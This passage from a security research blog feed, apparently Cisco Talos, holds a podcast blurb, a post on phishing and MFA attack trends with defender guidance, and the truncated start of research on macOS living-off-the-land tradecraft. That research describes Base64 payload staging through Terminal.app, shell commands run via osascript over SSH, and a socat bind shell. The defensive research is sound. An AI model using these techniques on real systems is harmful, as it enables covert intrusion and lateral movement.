10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol LastRow SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="608127993" paraeid="{7555e31a-d083-4f80-9934-16e5e1dfdc9e}{36}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Pre-ransomware engagement</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr></tbody></table>
<!--kg-card-end: html-->
]]></content:encoded></item><item><title><![CDATA[[Podcast] It's not you, it's your printer: State-sponsored and phishing threats in 2025]]></title><description><![CDATA[In this episode of Talos Takes, Amy and Martin Lee unpack state-sponsored and phishing trends from the 2025 Talos Year in Review.]]></description><link>https://blog.talosintelligence.com/podcast-its-not-you-its-your-printer-state-sponsored-and-phishing-threats-in-2025/</link><guid isPermaLink="false">69e634c2645a220001422c5f</guid><category><![CDATA[2025YiR]]></category><category><![CDATA[Year In Review]]></category><dc:creator><![CDATA[Amy Ciminnisi]]></dc:creator><pubDate>Tue, 21 Apr 2026 12:29:49 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/YiR2025_cover_2x1-2-1.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/YiR2025_cover_2x1-2-1.jpg" alt="[Podcast] It&apos;s not you, it&apos;s your printer: State-sponsored and phishing threats in 2025"><p>In this episode, we unpack state-sponsored and phishing trends from the 2025 Talos Year in Review. Amy and Martin Lee explore the alarming rise of internal phishing campaigns that bypass traditional perimeter defenses, including the widespread weaponization of Microsoft 365&apos;s Direct Send feature. Beyond simple phishing, we analyze the aggressive, blended operations of state-sponsored actors from China and North Korea who are combining high-level zero-day exploits with sophisticated social engineering. From the &quot;Dear Leader&quot; interview test to the reality of fake developer personas, we break down exactly how these adversaries are infiltrating modern organizations.</p><p><a href="https://blog.talosintelligence.com/2025yearinreview/" rel="noreferrer">View the 2025 Year in Review here.</a></p><figure class="kg-card kg-embed-card"><iframe style="border-radius: 12px" width="100%" height="152" title="Spotify Embed: It&apos;s not you, it&apos;s your printer: State-sponsored and phishing threats in 2025" frameborder="0" allowfullscreen allow="autoplay; clipboard-write; encrypted-media; fullscreen; picture-in-picture" loading="lazy" src="https://open.spotify.com/embed/episode/2bR5sF3n1P3T2v8ib2VFUL?si=29a205c2d7bd45e9&amp;utm_source=oembed"></iframe></figure>]]></content:encoded></item><item><title><![CDATA[Phishing and MFA exploitation: Targeting the keys to the kingdom]]></title><description><![CDATA[In 2025, attackers increasingly targeted weaknesses in multi-factor authentication (MFA) workflows, and phishing attacks leveraged valid, compromised credentials to launch lures from trusted accounts. The trends focused entirely on trust, or the lack thereof, in everyday business operations.]]></description><link>https://blog.talosintelligence.com/phishing-and-mfa-exploitation-targeting-the-keys-to-the-kingdom/</link><guid isPermaLink="false">69e279f1645a220001422b73</guid><category><![CDATA[2025YiR]]></category><category><![CDATA[MFA]]></category><category><![CDATA[phishing]]></category><category><![CDATA[Year In Review]]></category><dc:creator><![CDATA[Kri Dontje]]></dc:creator><pubDate>Tue, 21 Apr 2026 12:00:08 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/2025YiR-topic_phishing-identity.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/2025YiR-topic_phishing-identity.jpg" alt="Phishing and MFA exploitation: Targeting the keys to the kingdom"><p>In 2025, attackers increasingly targeted weaknesses in multi-factor authentication (MFA) workflows, and phishing attacks leveraged valid, compromised credentials to launch lures from trusted accounts. The trends focused entirely on trust, or the lack thereof, in everyday business operations.</p><h2 id="phishing">Phishing</h2><p>In 2025, phishing attacks were used for initial access in 40% of incidents, maintaining their prevalence. Attackers ramped up cascaded phishing campaigns, where attackers leveraged the trust of the initial compromised account to create specialized phishing attempts, within the network and out of it, aimed at trusted partners and third parties<a>.</a></p><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/YiR_figsforblog_phishing_trends.jpg" class="kg-image" alt="Phishing and MFA exploitation: Targeting the keys to the kingdom" loading="lazy" width="1875" height="1422" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/YiR_figsforblog_phishing_trends.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/YiR_figsforblog_phishing_trends.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/YiR_figsforblog_phishing_trends.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/YiR_figsforblog_phishing_trends.jpg 1875w" sizes="(min-width: 720px) 720px"></figure><h3 id="email-composition-trends">Email composition trends</h3><p>The content of phishing emails changed somewhat. Transitioning away from spam offers, they took the form of workflow-style emails &#x2014; IT, travel, and other everyday business tasks that look familiar to employees and executives. Travel and logistics lures in particular surged, while political lures dropped off. Internal expensing and travel emails, even when legitimate, are often repetitive and come from disparate sources with changeable formats or poorly-rendered templates, leading to a lowered guard toward spotting malicious intent. Attackers were likely aiming to steal credentials, payment information, or MFA tokens via fake single sign-on (SSO) pages.</p><p>In reviews of thousands of blocked-email keywords, 60% contained subject lines with &quot;request,&quot; &quot;invoice,&quot; &quot;fwd,&quot; &quot;report,&quot; and similar. IT-focused phishing keywords turned more technical, to words like &quot;tampering,&quot; &quot;domain,&quot; &quot;configuration,&quot; &quot;token,&quot; and others, showing that attackers were making plays toward IT and security workflows.</p><p>Attackers also abused Microsoft 365 Direct Send to capitalize on internal email trust. Direct Send is the method by which networked devices like printers and scanners deliver documents to users. The messages appear to be sent and received by the same email address. These internal messages do not receive the same scrutiny that external emails do, from employees or automated email filters. Direct Send allowed attackers to spoof internal email addresses and deliver highly convincing lures from inside the organization, without compromising real accounts, to target key attack services and deliver high-impact damage.</p><h2 id="mfa-and-identity-attacks">MFA and identity attacks</h2><p>Identity and access management (IAM) applications have grown popular with organizations hoping to consolidate user privileges. Unfortunately, it has also grown in popularity with attackers. Nearly a third of 2025 MFA spray attacks targeted IAM, turning the tools companies used to maintain access control into a point of failure. Device compromise surged by 178%, largely driven by voice phishing designed to trick administrators into registering malicious devices.</p><h3 id="mfa-spray-and-device-compromise">MFA spray and device compromise</h3><p>MFA attack strategy changed by sector. A successful attack could glean SSO tokens and give adversaries the ability to change user roles and credentials, or even the MFA policies themselves. Attackers increasingly exploited authentication workflows to gain and maintain access.</p><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/YiR_figsforblog_MFA_attack_style-1.jpg" class="kg-image" alt="Phishing and MFA exploitation: Targeting the keys to the kingdom" loading="lazy" width="1862" height="1070" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/YiR_figsforblog_MFA_attack_style-1.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/YiR_figsforblog_MFA_attack_style-1.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/YiR_figsforblog_MFA_attack_style-1.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/YiR_figsforblog_MFA_attack_style-1.jpg 1862w" sizes="(min-width: 720px) 720px"></figure><p>Spray attacks were deployed against networks with predictable identity behavior, while diverse, unmanaged, or high-turnover device ecosystems proved weaker to device compromise attacks.</p><p>Notably, higher education was the most targeted device compromise sector. Several factors could contribute to the trend:</p><p>&#xB7;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0; Diverse unmanaged device population</p><p>&#xB7;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0; Poorly patched and managed operating systems</p><p>&#xB7;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0; Necessarily low new-device verification policies</p><p>&#xB7;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0; Large, public-facing directories for targeted phishing</p><p>Higher education was a very unfavorable target for MFA spray attacks, however. Passwords and MFA are also highly varied and segmented, and most universities have strong login portal policies, enforced lockouts, and login attempt limits.</p><h2 id="guidance-for-defenders">Guidance for defenders</h2><p>As always, prioritize based on your own environment.</p><p>Organizations should keep in mind that living-off-the-land binaries (LOLBins) and open-source and dual-use tools, which are not inherently malicious, are key to further exploitation. Blocking external IPs from using a feature, enabling Microsoft&#x2019;s newer &#x201C;Reject Direct Send&#x201D; control, tightening SPF/DMARC enforcement, and treating &#x201C;internal-looking&#x201D; emails with the same scrutiny as inbound mail are currently the most effective defenses.</p><p>Likewise, MFA attack protection should be tailored to the style of environment and sector.</p><p>MFA spray attacks work well on stable, scaled identity controls. Counter these attacks with strong lockout policies, good password hygiene, and conditional access. </p><p>Device compromise works best on variable networks where devices change over fast and MFA use is spotty. Work on establishing better device hardening and management, session controls, and strict phishing-resistant MFA with enrollment governance. Solutions such as <a href="https://duo.com/"><u>Cisco Duo</u></a> provide controls for phishing-resistant MFA, device trust, and secure enrollment, helping reduce risk from phishing and identity-based attacks. </p><p></p><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/YiR_figsforblog_targeted_apps_MFA-1.jpg" class="kg-image" alt="Phishing and MFA exploitation: Targeting the keys to the kingdom" loading="lazy" width="1875" height="1725" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/YiR_figsforblog_targeted_apps_MFA-1.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/YiR_figsforblog_targeted_apps_MFA-1.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/YiR_figsforblog_targeted_apps_MFA-1.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/YiR_figsforblog_targeted_apps_MFA-1.jpg 1875w" sizes="(min-width: 720px) 720px"></figure><p>This blog only scratched the surface on 2025 threat trends. See the full <a href="https://blog.talosintelligence.com/2025yearinreview">Year in Review report</a> for a detailed explanation of Microsoft 365 Direct Send and how it was used for attacks, infographic breakdowns of MFA spray vs. device compromise attacks, the full list of targeted tools and sectors by percentage, and more. </p>]]></content:encoded></item><item><title><![CDATA[Bad Apples: Weaponizing native macOS primitives for movement and execution]]></title><description><![CDATA[Cisco Talos documents several macOS living-off-the-land (LOTL) techniques, demonstrating that native pathways for movement and execution remain accessible to those who understand the underlying architecture. ]]></description><link>https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/</link><guid isPermaLink="false">69e62568645a220001422bae</guid><category><![CDATA[Threat Spotlight]]></category><dc:creator><![CDATA[William Charles Gibson]]></dc:creator><pubDate>Tue, 21 Apr 2026 10:00:29 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/bad-apples.jpg" medium="image"/><content:encoded><![CDATA[<ul><li>As macOS adoption grows among developers and DevOps, it has become a high&#xA0;value target; however, native &quot;living-off-the-land&quot; (LOTL) techniques for the platform remain significantly under-documented compared to Windows.&#xA0;</li><li>Adversaries can bypass security controls by repurposing native features like Remote Application Scripting&#xA0;(RAS) for remote execution and abusing Spotlight metadata (Finder comments) to stage payloads in a way that evades static file analysis.&#xA0;</li><li>Attackers can move toolkits and&#xA0;establish&#xA0;persistence using built-in protocols&#xA0;such as SMB,&#xA0;Netcat, Git, TFTP, and SNMP&#xA0;operating&#xA0;entirely outside the visibility of standard SSH-based telemetry.&#xA0;</li><li>Defenders should shift from static file scanning to&#xA0;monitoring&#xA0;process lineage, inter-process communication (IPC) anomalies, and enforcing strict MDM policies to disable unnecessary administrative services.</li></ul><hr><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/bad-apples.jpg" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution"><p>As macOS adoption in the enterprise reaches record highs, with over 45 percent of organizations now&#xA0;utilizing&#xA0;the platform, the traditional &quot;security through obscurity&quot; narrative surrounding the&#xA0;OS&#xA0;has been&#xA0;rendered&#xA0;obsolete. Mac endpoints, once relegated to creative departments, are now the primary workstations for developers, DevOps engineers, and system administrators. Consequently, these machines have become high-value targets that serve as gateways to source code repositories, cloud infrastructure, and sensitive production credentials.&#xA0;</p><p>Despite this shift, macOS-native lateral movement and&#xA0;execution&#xA0;tradecraft remain significantly understudied compared to&#xA0;their&#xA0;Windows counterparts. This research was conducted to address this critical knowledge gap. Through a systematic validation of native macOS protocols and system binaries, it is&#xA0;demonstrated&#xA0;how adversaries can&#xA0;&#x201C;live off the land&#x201D;&#xA0;(LOTL) by repurposing legitimate administrative tools. By weaponizing native primitives, such as Remote Application Scripting&#xA0;(RAS) and Spotlight metadata, intentional OS security features can be bypassed to transform standard system functions into robust mechanisms for arbitrary code execution and fleet-wide orchestration.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/bad-apples-flow.jpg" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="2000" height="864" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/bad-apples-flow.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/bad-apples-flow.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/bad-apples-flow.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/bad-apples-flow.jpg 2310w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 1.&#xA0;macOS&#xA0;living-off-the-land (LOTL)&#xA0;attack&#xA0;flow.</span></figcaption></figure><h2 id="the-macos-enterprise-blind-spot">The macOS&#xA0;enterprise&#xA0;blind&#xA0;spot&#xA0;</h2><p>macOS is no longer a niche operating system. According to the&#xA0;<a href="https://survey.stackoverflow.co/2024/" rel="noreferrer noopener"><u>Stack Overflow 2024 Developer Survey</u></a>, a third of professional developers use macOS as their primary platform. These machines&#xA0;represent&#xA0;high-value pivot points, often holding source code repositories, cloud credentials, and SSH keys to production infrastructure.&#xA0;</p><p>Despite this trend, the MITRE ATT&amp;CK framework documents far fewer techniques for macOS than for Windows, and recent industry reports&#xA0;indicate&#xA0;that macOS environments prevent significantly fewer attacks than their Windows or Linux counterparts. To address this disparity, community-driven resources such as&#xA0;<a href="https://www.loobins.io/" rel="noreferrer noopener"><u>LOOBins</u></a>&#xA0;(living-off-the-orchard&#xA0;binaries) have&#xA0;emerged&#xA0;to catalog native macOS binaries that can be repurposed for malicious activity. This research aims to further close that gap by systematically&#xA0;enumerating&#xA0;the native pathways available for both movement and execution.</p><h2 id="remote-command-execution-weaponizing-native-primitives">Remote&#xA0;command&#xA0;execution: Weaponizing&#xA0;native&#xA0;primitives&#xA0;</h2><p>Establishing a remote shell is the first step in any post-exploitation chain. While SSH is the standard, native macOS features&#xA0;provide&#xA0;several alternatives that can bypass traditional monitoring.&#xA0;</p><h3 id="remote-application-scripting-as-a-software-deployment-tool-t1072">Remote Application&#xA0;Scripting&#xA0;as a&#xA0;Software&#xA0;Deployment&#xA0;Tool (T1072)&#xA0;</h3><p>Remote Application&#xA0;Scripting&#xA0;(RAS, formerly known as Remote Apple Events or RAE)&#xA0;was&#xA0;introduced to extend the capabilities of the AppleScript&#xA0;Inter-Process Communication (IPC) framework across a network. By&#xA0;utilizing&#xA0;the Electronic Program-to-Program Communication (&#x201C;eppc&#x201D;) protocol, administrative tasks and application automation&#xA0;can be performed&#xA0;on remote&#xA0;macOS systems. This mechanism allows a controller machine to send high-level commands to a target machine, which&#xA0;are&#xA0;then processed by the&#xA0;&#x201C;AppleEventsD&#x201D;&#xA0;daemon.&#xA0;</p><p>The Open Scripting Architecture (OSA) is&#xA0;utilized&#xA0;as the standardized framework for&#xA0;this inter-application communication and automation on macOS. Through the exchange of Apple Events, this architecture enables scripts to programmatically interact with the operating system and installed applications, providing the functional foundation for the&#xA0;&#x201C;osascript&#x201D;&#xA0;utility.&#xA0;</p><p>Traditionally, RAS is viewed as a lateral movement vector; however, this research&#xA0;demonstrates&#xA0;that it can also be&#xA0;utilized&#xA0;as a standalone&#xA0;<a href="https://attack.mitre.org/techniques/T1072/" rel="noreferrer noopener"><u>Software Deployment Tool for Execution (T1072)</u></a>.&#xA0;</p><p>Adversaries&#xA0;attempting&#xA0;to use RAS for complex payloads often&#xA0;encounter&#xA0;Apple&#x2019;s intentional security features, specifically the&#xA0;-10016 Handler Error. This restriction prevents the&#xA0;&#x201C;System Events&#x201D;&#xA0;application from executing remote shell commands&#xA0;via&#xA0;<code>do&#xA0;shell script</code>,&#xA0;even when RAS is globally enabled.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-2.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="676" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-2.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-2.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-2.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-2.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 2.&#xA0;The -10016&#xA0;Handler&#xA0;Error in&#xA0;remote&#xA0;application&#xA0;scripting.</span></figcaption></figure><p>To bypass this,&#xA0;a methodology&#xA0;was developed that treats&#xA0;&#x201C;Terminal.app&#x201D;&#xA0;as an execution proxy. Unlike&#xA0;&#x201C;System Events&#x201D;,&#xA0;&#x201C;Terminal.app&#x201D;&#xA0;is designed for shell interaction and accepts&#xA0;remote&#xA0;&#x201C;do&#xA0;script&#x201D;&#xA0;commands. To ensure payload integrity and bypass AppleScript parsing limitations (such as the&#xA0;-2741 syntax&#xA0;error),&#xA0;Base64 transport encoding&#xA0;is&#xA0;utilized. This transforms multi-line scripts into flat, alphanumeric strings that are decoded and executed in a two-stage process:&#xA0;</p><ol><li><strong>Deployment:</strong>&#xA0;A single RAS command instructs the remote&#xA0;&#x201C;Terminal.app&#x201D;&#xA0;to decode the Base64 string into a temporary path and apply&#xA0;<code>chmod&#xA0;+x</code>.&#xA0;</li><li><strong>Invocation:</strong>&#xA0;A second RAS command explicitly invokes the script via&#xA0;&quot;bash&#x201D;,&#xA0;ensuring a proper shell context.</li></ol><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-3.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="596" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-3.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-3.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-3.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-3.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 3.&#xA0;Terminal.app&#xA0;as an&#xA0;execution&#xA0;proxy for Base64&#xA0;payloads.</span></figcaption></figure><h3 id="remote-application-scripting-for-lateral-movement-t1021005">Remote Application&#xA0;Scripting&#xA0;for Lateral Movement (T1021.005)&#xA0;</h3><p>While RAS can be weaponized for execution, its primary function&#xA0;remains&#xA0;the facilitation of inter-process communication (IPC) across a network. In a lateral movement context, RAS is&#xA0;utilized&#xA0;to control remote applications by targeting the&#xA0;&#x201C;eppc://&#x201D;&#xA0;URI. This allows for&#xA0;the remote&#xA0;manipulation of the file system or the retrieval of sensitive environmental data without the need for a traditional interactive shell.&#xA0;</p><p>For example, the command&#xA0;in Figure 4&#xA0;can be used to remotely query the Finder for a list of mounted volumes on a target machine, providing an adversary with immediate insight into the victim&apos;s network shares and external storage:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-4.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="394" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-4.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-4.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-4.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-4.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 4.&#xA0;Remotely&#xA0;querying&#xA0;mounted&#xA0;volumes via RAE.</span></figcaption></figure><p>Because these actions are performed via Apple Events rather than standard shell commands, they often bypass security telemetry that focuses exclusively on process&#xA0;execution&#xA0;trees, making RAS a discreet and effective vector for lateral movement.</p><h3 id="applescript-execution-via-ssh">AppleScript&#xA0;execution via SSH&#xA0;</h3><p>AppleScript is macOS&apos;s built-in scripting language for automation. While RAS is&#xA0;a viable&#xA0;application control mechanism, Apple security controls prevent RAS from launching applications; they must already be running. Additionally, RAS must be enabled on the target. To circumvent these obstacles,&#xA0;<code>osascript</code>&#xA0;can be invoked directly over SSH.&#xA0;<br>&#xA0;<br>Passing&#xA0;<code>osascript</code>&#xA0;the&#xA0;<code>system info</code>&#xA0;command over SSH returns critical environmental details:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-5.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="596" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-5.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-5.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-5.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-5.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 5.&#xA0;Retrieving&#xA0;system&#xA0;information via&#xA0;osascript&#xA0;over SSH.</span></figcaption></figure><p>For arbitrary command execution, AppleScript&apos;s&#xA0;<code>do shell script</code>&#xA0;handler can be invoked over SSH. In the following example,&#xA0;<code>do shell script</code>&#xA0;is used to write a file to the target:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-6.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="434" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-6.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-6.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-6.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-6.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 6.&#xA0;Arbitrary&#xA0;file&#xA0;creation&#xA0;using do&#xA0;shell script over SSH.&#xA0;</span></figcaption></figure><p>While SSH alone can&#xA0;accomplish&#xA0;shell tasks,&#xA0;<code>osascript</code>&#xA0;provides access to&#xA0;graphical user&#xA0;interfact&#xA0;(GUI)&#xA0;automation and Finder manipulation through&#xA0;Apple Events IPC&#xA0;rather than spawning shell processes. This creates a significant telemetry gap, as most endpoint detection tooling has less visibility into IPC-driven actions than standard shell process trees.</p><h3 id="socat-remote-shell">socat&#xA0;remote&#xA0;shell&#xA0;</h3><p><code>socat</code>&#xA0;(SOcket&#xA0;CAT) is a command line utility for&#xA0;establishing&#xA0;bidirectional data streams between two endpoints. It supports a wide range of socket types including TCP, UDP, Unix domain sockets, and pseudo terminals (pty).&#xA0;</p><p>In a lateral movement context,&#xA0;<code>socat</code>&#xA0;can&#xA0;establish&#xA0;an interactive shell on a target without relying on SSH. The target runs a listener that binds a login shell to a TCP port with&#xA0;pty&#xA0;allocation, and the attacker&#xA0;connects to&#xA0;it from a remote machine.&#xA0;</p><p>On the target, the listener spawns an interactive bash session for each incoming connection with&#xA0;pty&#xA0;forwarding:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-7.png" class="kg-image" alt="Bad Apples: Weaponizing native macOS primitives for movement and execution" loading="lazy" width="1750" height="394" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Figure-7.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Figure-7.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Figure-7.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Figure-7.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 7.&#xA0;Establishing a&#xA0;listener with PTY&#xA0;forwarding&#xA0;on 